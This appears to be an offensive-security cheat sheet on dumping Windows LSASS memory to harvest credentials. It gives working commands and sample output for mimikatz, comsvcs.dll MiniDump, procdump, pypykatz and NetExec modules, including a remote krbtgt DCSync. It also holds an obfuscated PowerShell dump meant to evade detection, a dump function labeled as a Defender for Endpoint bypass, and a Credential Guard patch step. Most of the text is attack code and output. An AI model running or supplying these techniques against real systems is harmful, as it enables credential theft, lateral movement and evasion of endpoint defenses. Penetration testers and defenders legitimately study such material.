Task Manager Method
Copy C:\htb> mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 Sep 18 2020 19:18:29
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz # log
Using 'mimikatz.log' for logfile : OK
mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP : 'lsass.dmp'
mimikatz # sekurlsa::logonpasswords
Opening : 'lsass.dmp' file for minidump...
Authentication Id : 0 ; 23196355 (00000000:0161f2c3)
Session : Interactive from 4
User Name : DWM-4
Domain : Window Manager
Logon Server : (null)
Logon Time : 3/31/2021 3:00:57 PM
SID : S-1-5-90-0-4
msv :
tspkg :
wdigest :
* Username : WINLPE-SRV01$
* Domain : WORKGROUP
* Password : (null)
kerberos :
ssp :
credman :
<SNIP>
Authentication Id : 0 ; 23026942 (00000000:015f5cfe)
Session : RemoteInteractive from 2
User Name : jordan
Domain : WINLPE-SRV01
Logon Server : WINLPE-SRV01
Logon Time : 3/31/2021 2:59:52 PM
SID : S-1-5-21-3769161915-3336846931-3985975925-1000
msv :
[00000003] Primary
* Username : jordan
* Domain : WINLPE-SRV01
* NTLM : cf3a5525ee9414229e66279623ed5c58
* SHA1 : 3c7374127c9a60f9e5b28d3a343eb7ac972367b2
tspkg :
wdigest :
* Username : jordan
* Domain : WINLPE-SRV01
* Password : (null)
kerberos :
* Username : jordan
* Domain : WINLPE-SRV01
* Password : (null)
ssp :
credman :
<SNIP> Mimikatz
Copy Invoke-Mimikatz -Command '"sekurlsa::ekeys"' SafetyKatz
Copy SafetyKatz.exe "sekurlsa::ekeys" BetterSafetyKatz
SharpKatz
Copy SharpKatz.exe --Command ekeys Dumpert (Direct Syscalls and API unhooking)
Copy rundll32.exe C:\Dumpert\Outflank-Dumpert.dll,Dump Rundll32.exe & Comsvcs.dll Method
Copy tasklist /FI "IMAGENAME eq lsass.exe"
rundll32.exe C:\windows\System32\comsvcs.dll, Minidump <lsass_process_id> C:\Users\Public\lsass.dmp full LSASS PID in cmd: tasklist /svc
Copy C:\Windows\system32> tasklist /svc
Image Name PID Services
========================= ======== ============================================
System Idle Process 0 N/A
System 4 N/A
Registry 96 N/A
smss.exe 344 N/A
csrss.exe 432 N/A
wininit.exe 508 N/A
csrss.exe 520 N/A
winlogon.exe 580 N/A
services.exe 652 N/A
lsass.exe 672 KeyIso, SamSs, VaultSvc
svchost.exe 776 PlugPlay
svchost.exe 804 BrokerInfrastructure, DcomLaunch, Power,
SystemEventsBroker
fontdrvhost.exe 812 N/A LSASS PID in powershell: Get-Process lsass
Copy PS C:\Windows\system32> Get-Process lsass
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
1260 21 4948 15396 2.56 672 0 lsass LSASS dump:
Copy PS C:\Windows\system32> rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full Transfer dump
Transfer over SMB - as for SAM secrets
Exctract Credentials
Copy $ pypykatz lsa minidump /home/peter/Documents/lsass.dmp
INFO:root:Parsing file /home/peter/Documents/lsass.dmp
FILE: ======== /home/peter/Documents/lsass.dmp =======
== LogonSession ==
authentication_id 1354633 (14ab89)
session_id 2
username bob
domainname DESKTOP-33E7O54
logon_server WIN-6T0C3J2V6HP
logon_time 2021-12-14T18:14:25.514306+00:00
sid S-1-5-21-4019466498-1700476312-3544718034-1001
luid 1354633
== MSV ==
Username: bob
Domain: DESKTOP-33E7O54
LM: NA
NT: 64f12cddaa88057e06a81b54e73b949b
SHA1: cba4e545b7ec918129725154b29f055e4cd5aea8
DPAPI: NA
== WDIGEST [14ab89]==
username bob
domainname DESKTOP-33E7O54
password None
password (hex)
== Kerberos ==
Username: bob
Domain: DESKTOP-33E7O54
== WDIGEST [14ab89]==
username bob
domainname DESKTOP-33E7O54
password None
password (hex)
== DPAPI [14ab89]==
luid 1354633
key_guid 3e1d1091-b792-45df-ab8e-c66af044d69b
masterkey e8bc2faf77e7bd1891c0e49f0dea9d447a491107ef5b25b9929071f68db5b0d55bf05df5a474d9bd94d98be4b4ddb690e6d8307a86be6f81be0d554f195fba92
sha1_masterkey 52e758b6120389898f7fae553ac8172b43221605
... SNIP ... Netexec - CME - Remotely
Copy nxc smb 192.168.255.131 -u administrator -p pass -M lsassy
Copy nxc smb 192.168.255.131 -u administrator -p pass -M nanodump
Copy nxc smb 192.168.255.131 -u administrator -p pass -M mimikatz
Copy nxc smb 192.168.255.131 -u Administrator -p pass -M mimikatz -o COMMAND='"lsadump::dcsync /domain:domain.local /user:krbtgt" SMB Module handlekatz: [*] handlekatz Get lsass dump using handlekatz64 and parse the result with pypykatz
SMB module procdump: [*] procdump Get lsass dump using procdump64 and parse the result with pypykatz
Procdump
See: https://beta.hackndo.com/remote-lsass-dump-passwords/
Copy C:\htb> procdump.exe -accepteula -ma lsass.exe lsass.dmp
ProcDump v10.0 - Sysinternals process dump utility
Copyright (C) 2009-2020 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com
[15:25:45] Dump 1 initiated: C:\Tools\Procdump\lsass.dmp
[15:25:45] Dump 1 writing: Estimated dump file size is 42 MB.
[15:25:45] Dump 1 complete: 43 MB written in 0.5 seconds
[15:25:46] Dump count reached. Load in Mimikatz and Pass The Hash - See Task Manager Method
TrickDump
MultiDump
Obfuscated LSASS Dump
Copy PS C:> start-job { cd e:; while ($true) { cp dmp.log dmp.log2;}}
PS E:> &$env:???t??r???\*2\r[t-u]???[k-l]?2* $(gi $env:???t??r???\*2\c?m?[v-w]*l | % { $_.FullName }), `#-99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999976-decoy $(gps l?a*s).id c:\t??p\dmp.log full; Wait-Process -Id (Get-Process rundll32).id ;
Copy &$env:???t??r???\*2\r[t-u]???[k-l]?2* $(gi $env:???t??r???\*2\c?m?[v-w]*l | % {
$_.FullName }), `#-999999999999999999999999999999999999999999999999999999999
9999999999999999999999999999999999999999999999999999999999999999999999999999
9999999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999976-decoy $(gps l?a*s).id dmp.tmp full; Wait-Process
-Id (Get-Process rundll32).id ; (Get-Item -Path E:\dmp.tmp).Encrypt(); Parse dump
RustiveDump
LsassReflectDumping
RtlCreateProcessReflection
ShadowDumper
MiniDumpDotNet
Copy .\minidumpdotnet.exe <LSASS_PID> <minidump_file> tasklist /v to enumerate LSASS PID is detected by EDR
FindLSASSPID.cpp
Copy // Find PID of a process by name
int FindPID(const char* procname)
{
int pid= 0;
PROCESSENTRY32 proc = {};
proc.dwSize= sizeof(PROCESSENTRY32);
HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);bool bProc= Process32First(snapshot, &proc);
while (bProc)
{
if (strcmp(procname, proc.szExeFile) == 0)
{
pid= proc.th32ProcessID;
break;
}
bProc= Process32Next(snapshot, &proc);
}
return pid;
} Nanodump
POSTDump
Powershell - Bypass Defender for Endpoint
Copy function Write-MemoryDump {
param(
[string]$outputPath
)
$processId = Get-ProcessId
if (-not $processId) { return $false }
try {
# Open target process
$processHandle = [System.Diagnostics.Process]::GetProcessById($processId).Handle
if (-not $processHandle) {
Write-Host “Failed to open target process with PID: $processId”
return $false
}
Write-Host “Successfully opened target process with PID: $processId”
# Create dump file
$fileStream = [System.IO.File]::Open($outputPath, [System.IO.FileMode]::Create, [System.IO.FileAccess]::Write)
$fileHandle = $fileStream.SafeFileHandle.DangerousGetHandle()
Write-Host “Dump file created at $outputPath”
# Write memory dump
$success = [DumpGenerator]::MiniDumpWriteDump(
$processHandle,
[uint32]$processId,
$fileHandle,
[uint32]$FullMemoryDump,
[IntPtr]::Zero,
[IntPtr]::Zero,
[IntPtr]::Zero
)
# Close file stream and release process handle
$fileStream.Close()
[System.Runtime.InteropServices.Marshal]::Release($processHandle)
if ($success) {
Write-Host “Memory dump successfully written to $outputPath”
return $true
} else {
Write-Host “Failed to write memory dump.”
return $false
}
} catch {
Write-Host “An error occurred: $_”
return $false
}
} Lsass-Shtinkering
Go-lsass
Blindsight
AxiomDumper
Bypass Credential Guard
Credential Guard is a virtualization-based isolation technology for LSASS which prevents attackers from stealing credentials that could be used for pass the hash attacks.
Copy NativeBypassCredGuard.exe patch true Then run your LSASS dump
Resources
